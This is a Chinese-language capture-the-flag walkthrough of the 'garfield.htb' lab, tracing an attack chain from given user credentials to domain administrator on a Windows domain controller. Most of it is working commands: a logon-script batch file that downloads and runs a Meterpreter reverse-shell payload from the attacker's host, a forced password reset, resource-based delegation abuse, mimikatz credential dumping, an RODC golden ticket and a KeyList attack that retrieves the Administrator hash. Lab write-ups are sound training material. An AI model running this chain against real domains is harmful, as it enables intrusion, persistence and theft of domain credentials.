目标信息
IP地址:
10.129.214.84(非固定IP地址)题目凭据:
j.arbuckle / Th1sD4mnC4t!@1978
信息收集
ICMP检测
PING 10.129.214.84 (10.129.214.84) 56(84) bytes of data.
64 bytes from 10.129.214.84: icmp_seq=1 ttl=127 time=166 ms
64 bytes from 10.129.214.84: icmp_seq=2 ttl=127 time=173 ms
64 bytes from 10.129.214.84: icmp_seq=3 ttl=127 time=135 ms
64 bytes from 10.129.214.84: icmp_seq=4 ttl=127 time=143 ms
--- 10.129.214.84 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 135.072/154.438/173.155/15.657 ms攻击机和靶机间网络连接状态良好。
防火墙检测
# Nmap 7.98 scan initiated Thu Apr 9 07:01:00 2026 as: /usr/lib/nmap/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.214.84
Nmap scan report for 10.129.214.84
Host is up (0.20s latency).
All 65535 scanned ports on 10.129.214.84 are in ignored states.
Not shown: 65535 open|filtered tcp ports (no-response)
# Nmap done at Thu Apr 9 07:01:45 2026 -- 1 IP address (1 host up) scanned in 45.86 seconds无法探测靶机防火墙状态。
网络端口扫描
TCP端口扫描结果
# Nmap 7.98 scan initiated Thu Apr 9 07:05:56 2026 as: /usr/lib/nmap/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.214.84
Nmap scan report for 10.129.214.84
Host is up (0.27s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-09 07:07:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.garfield.htb
| Not valid before: 2026-02-13T01:10:36
|_Not valid after: 2026-08-15T01:10:36
| rdp-ntlm-info:
| Target_Name: GARFIELD
| NetBIOS_Domain_Name: GARFIELD
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: garfield.htb
| DNS_Computer_Name: DC01.garfield.htb
| DNS_Tree_Name: garfield.htb
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-09T07:08:56+00:00
|_ssl-date: 2026-04-09T07:09:36+00:00; +8h00m02s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49899/tcp open msrpc Microsoft Windows RPC
49971/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-04-09T07:08:57
|_ start_date: N/A
|_clock-skew: mean: 8h00m01s, deviation: 0s, median: 8h00m01s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 321.09 ms 10.10.16.1
2 321.29 ms 10.129.214.84
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 9 07:09:43 2026 -- 1 IP address (1 host up) scanned in 226.75 secondsUDP端口开放列表扫描结果
# Nmap 7.98 scan initiated Thu Apr 9 07:10:46 2026 as: /usr/lib/nmap/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.214.84
Nmap scan report for 10.129.214.84
Host is up (0.20s latency).
Not shown: 65531 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
# Nmap done at Thu Apr 9 07:11:32 2026 -- 1 IP address (1 host up) scanned in 45.51 secondsUDP端口详细信息扫描结果
(无)同时发现靶机操作系统为Windows Server,且仅运行域控服务,主域名为garfield.htb,域控主机名为DC01。
服务探测
DNS服务(53端口)
首先使用dig命令查询目标域主要记录:
dig any garfield.htb @dc01.garfield.htb
发现仅查询出域控相关记录,除此之外,未发现任何信息。
Windows SMB服务
尝试使用impacket-smbclient连接靶机SMB服务:
impacket-smbclient garfield.htb/j.arbuckle:'Th1sD4mnC4t!@1978'@dc01.garfield.htb
连接成功后,进入SYSVOL共享枚举,在/garfield.htb/scripts/共享目录下发现了printerDetect.bat批处理脚本文件:
@echo off
echo Detecting installed printers...
echo ==============================
wmic printer get Name,DeviceID,PortName,DriverName,Shared,Status /format:table
echo.
echo Printer detection completed.
pause通过阅读脚本内容,可得知该脚本的作用为调用WMIC获取和靶机系统连接的打印机信息;还发现该目录是可写的:
除此之外,未发现任何可疑文件。
Active Directory服务
域内用户枚举
鉴于题目已经提供了一个普通用户凭据,我们可以利用impacket-lookupsid脚本对其进行RID爆破:
impacket-lookupsid garfield.htb/j.arbuckle:'Th1sD4mnC4t!@1978'@dc01.garfield.htb -domain-sids 40000
收集到的用户名如下:
Administrator Guest krbtgt DC01$ RODC01$
krbtgt_8245 j.arbuckle l.wilson l.wilson_adm域关系枚举
尝试使用bloodyAD工具枚举当前用户j.arbuckle可控制的域内对象:
bloodyAD -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --dc-ip 10.129.193.125 get writable --detail
发现当前用户对域内对象CN=Liz Wilson,CN=Users,DC=garfield,DC=htb和CN=Liz Wilson ADM,CN=Users,DC=garfield,DC=htb的scriptPath属性具有写入权限。
联网查询该属性,发现其作用为定义用户登录时所执行的脚本:
思考片刻,决定尝试修改上述两个用户对象的scriptPath属性,并向SYSVOL的Scripts目录上传恶意脚本,这样当域内用户登录时,恶意脚本就会被自动执行。
除此之外,未发现任何信息。
渗透测试
域对象scriptPath属性利用
在服务探测阶段,我们已经发现当前用户j.arbuckle可控制Liz Wilson和Liz Wilson ADM用户对象的scriptPath属性,且域SYSVOL目录的Scripts子目录可写,遂决定修改两个用户的scriptPath属性值,将其指向上传的恶意脚本,实现命令执行。
首先使用msfvenom生成反弹Shell程序,并开启Metasploit监听:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.58 LPORT=443 -f exe -o reverse443.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST 10.10.16.58
set LPORT 443
set ExitOnSession false
run -jz接着编写恶意BAT批处理脚本revshell.bat,并启动SimpleHTTPServer监听80端口:
@echo off
certutil -urlcache -split -f http://10.10.16.58/reverse443.exe C:WindowsTempreverse443.exe & C:WindowsTempreverse443.exe将脚本上传至garfield.htb/Scripts/目录下后退出SMB客户端,尝试使用bloodyAD修改Liz Wilson用户对象的scriptPath的属性值:
bloodyAD -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --dc-ip 10.129.227.37 set object "CN=Liz Wilson,CN=Users,DC=garfield,DC=htb" scriptPath -v "revshell.bat"
成功接收反弹Shell!
BloodHound域关系枚举
成功收到反弹Shell后,尝试以l.wilson用户身份,使用BloodHound进行域内信息收集。首先上传SharpHound.ps1收集器:
cd C:/Users/l.wilson/Desktop
upload ../../../../../../usr/share/sharphound/SharpHound.ps1
shell随后启动PowerShell,导入SharpHound模块并启动收集:
powershell -ep bypass
Import-Module ./PowerView.ps1
Invoke-BloodHound -CollectionMethod All -OutputPrefix "l-wilson" -OutputDirectory ./将收集好的数据集压缩包下载后,上传到BloodHound分析。首先使用Shortest paths to Domain Admins分析语句列出最短攻击路径:
发现l.wilson和l.wilson_adm具有WinRM管理权限,但按照最短攻击路径无法进一步渗透。尝试列出l.wilson可控制的对象:
发现l.wilson对l.wilson_adm具有重置密码权限,进一步查看l.wilson_adm可控对象,还发现该用户可将自身添加到RODC Administrators组内,并对只读域控机器账户有WriteAccountRestrictions权限,可实现RBCD委派攻击:
除此之外,还发现l.wilson_adm用户具有远程桌面登录权限:
经分析研判,决定先利用ForceChangePassword权限重置l.wilson_adm密码,再进行下一步利用。
重置l.wilson_adm用户凭据
在域关系枚举分析过程中,我们已经确定了使用ForceChangePassword权限重置l.wilson_adm密码的攻击路径,下面直接使用PowerView利用.
首先上传PowerView.ps1:
upload ../../../../../../usr/share/windows-resources/powersploit/Recon/PowerView.ps1
shell随后启动PowerShell,加载PowerView脚本模块:
powershell -ep bypass
Import-Module ./PowerView.ps1最后创建密码文本对象,调用Set-DomainUserPassword命令修改l.wilson_adm用户密码:
$newpass = ConvertTo-SecureString 'Asd310056' -AsPlainText -Force
Set-DomainUserPassword -Identity 'l.wilson_adm' -AccountPassword $newpass
修改完毕后,使用Remmina登录远程桌面:
登录成功!!
权限提升
域关系信息收集
登录l.wilson_adm用户后,决定先行寻找后续的攻击路径。点击RODC01只读域控机器账户,发现该账户对krbtgt_8245账户拥有ForceChangePassword权限:
而krbtgt_8245是只读域控专门用于加密经过该域控Kerberos认证请求字段的账户。尝试联网搜索,发现一种名为“RODC黄金票据”的域攻击方法,大致原理为取得RODC机器账户凭据后,修改该账户对象的msDS-RevealOnDemandGroup和msDS-NeverRevealGroup属性,设置目标账户白名单并清空黑名单后,利用RODC krbtgt账号哈希伪造只针对只读域控的黄金票据,最后发送带有KERB-KET-LIST-REQ的服务票据认证请求,向主域控获取目标账户的NTLM密码哈希。具体内容可访问链接查看:RODC | The Hacker Recipes
经分析研判,决定先利用l.wilson_adm用户的AddSelf和WriteAccountRestriction权限,将自身加入RODC Administrators组获取只读域控管理权限,并获取RODC01账户票据后,再进行进一步利用。
获取只读域控系统级权限
首先,使用BloodyAD工具将当前用户l.wilson_adm加入RODC Administrators组内:
bloodyAD -d garfield.htb -u l.wilson_adm -p "Asd310056" --host dc01.garfield.htb add groupMember "RODC Administrators" "l.wilson_adm"
成功!尝试查看l.wilson_adm用户现在的可控对象列表,发现当前用户已对RODC01机器账户对象的managedBy、msDS-RevealOnDemandGroup和msDS-NeverRevealGroup拥有了写入权限:
bloodyAD -d garfield.htb -u l.wilson_adm -p "Asd310056" --host dc01.garfield.htb get writable --detail
成功添加当前用户到RODC Administrators后,返回l.wilson用户的RDP会话,在靶机上打开Windows远程桌面,输入主机名rodc01.garfield.htb和用户名l.wilson_adm,点击连接,并在密码提示框中输入之前修改的密码:
连接成功后将该RDP会话窗口最小化备用,现在利用WriteAccountRestrictions权限获取RODC01的服务票据,从而进一步获取其SYSTEM权限。首先使用impacket-addcomputer工具添加一个普通机器账户misaka19008,随后进行委派攻击:
impacket-addcomputer -computer-name 'misaka19008$' -computer-pass "Asd310056" -dc-host dc01.garfield.htb garfield.htb/l.wilson_adm:"Asd310056"
impacket-rbcd -delegate-from 'misaka19008$' -delegate-to 'RODC01$' -action 'write' garfield.htb/l.wilson_adm:'Asd310056'
impacket-getST -spn 'cifs/rodc01.garfield.htb' -impersonate Administrator garfield.htb/'misaka19008$':'Asd310056'
成功获取SMB服务票据!现在使用impacket-psexec工具获取SYSTEM权限Shell。首先返回RDP会话,从攻击机下载iox端口转发工具,下载完毕后执行如下命令启动端口转发:EddieIvan01/iox: Tool for port forwarding & intranet proxy
# On Kali Linux VM
./iox proxy -l *2222 -l 1080 -k 314159
# On target machine
./iox.exe proxy -r *10.10.16.58:2222 -k 314159并在/etc/proxychains4.conf中添加如下配置:
socks5 127.0.0.1 1080隧道建立完成后,使用impacket-psexec工具,通过服务票据获取SYSTEM权限会话:
export KRB5CCNAME=/home/misaka19008/Documents/pentest_notes/garfield/Administrator@cifs_rodc01.garfield.htb@GARFIELD.HTB.ccache
proxychains4 -q -f proxychains4.conf impacket-psexec -k -no-pass rodc01.garfield.htb注:此处需要在
/etc/hosts中添加关于RODC01主机的记录,通过dig工具可得知其IP地址为192.168.100.2。
成功!此处为方便操作,直接使用certutil工具下载了reverse443.exe木马文件,创建了Meterpreter会话。为进行RODC黄金票据攻击,需要上传mimikatz.exe,获取krbtgt_8245账户AES256哈希值:
./mimikatz.exe "privilege::debug" "lsadump::lsa /inject" "exit"
成功获取域内用户凭据:
- 域:
garfield.htb - 用户名:
krbtgt_8245 AES256哈希:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240
现在进行RODC黄金票据攻击的要素均已齐全,开始进行利用。
RODC黄金票据攻击
在进行只读域控黄金票据攻击前,我们首先需要清空RODC01机器账户对象属性msDS-NeverRevealGroup,并在msDS-RevealOnDemandGroup中添加域管理员组,如果忽略此过程,则黄金票据请求会直接失败,因为域管理员组在黑名单内,且白名单中没有目标用户组。
返回l.wilson_adm的RDP会话,从攻击机上下载PowerView.ps1,下载完成后导入脚本,调用Set-DomainObject命令完成操作:
powershell -ep bypass
curl -Uri http://10.10.16.58/PowerView.ps1 -OutFile C:/Users/l.wilson_adm/Desktop/PowerView.ps1
Import-Module C:/Users/l.wilson_adm/Desktop/PowerView.ps1
Set-DomainObject -Identity "CN=RODC01,OU=DOMAIN CONTROLLERS,DC=GARFIELD,DC=HTB" -Clear 'msDS-NeverRevealGroup'
Set-DomainObject -Identity "CN=RODC01,OU=DOMAIN CONTROLLERS,DC=GARFIELD,DC=HTB" -Set @{'msDS-RevealOnDemandGroup'='CN=ADMINISTRATORS,CN=BUILTIN,DC=GARFIELD,DC=HTB'}
成功!接下来返回RODC01的SYSTEM权限Meterpreter会话,上传Rubeus v2.3.3最新版本工具制作RODC黄金票据:SharpCollection/NetFramework_4.7_x64/Rubeus.exe at master · Flangvik/SharpCollection
powershell -ep bypass
./Rubeus.exe golden /rodcNumber:8245 /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /user:Administrator /id:500 /domain:garfield.htb /sid:S-1-5-21-2502726253-3859040611-225969357
成功!接下来利用新制作的Administrator权限票据进行KeyList攻击,获取域管理员用户NTLM哈希:
./Rubeus.exe asktgs /enctype:aes256 /keyList /ticket:ticket_2026_04_11_18_43_26_Administrator_to_krbtgt@GARFIELD.HTB.kirbi /service:krbtgt/garfield.htb /dc:dc01.garfield.htb
成功获得域管理员用户凭据:
- 域:
garfield.htb - 用户名:
Administrator NTLM哈希:EE238F6DEBC752010428F20875B092D5
直接使用crackmapexec执行更改密码命令:
crackmapexec smb dc01.garfield.htb -d garfield.htb -u Administrator -H "EE238F6DEBC752010428F20875B092D5" -x "net user Administrator Asd310056 /domain"随后使用evil-winrm登录:
evil-winrm -i dc01.garfield.htb -u Administrator -p "Asd310056"
提权成功!!!!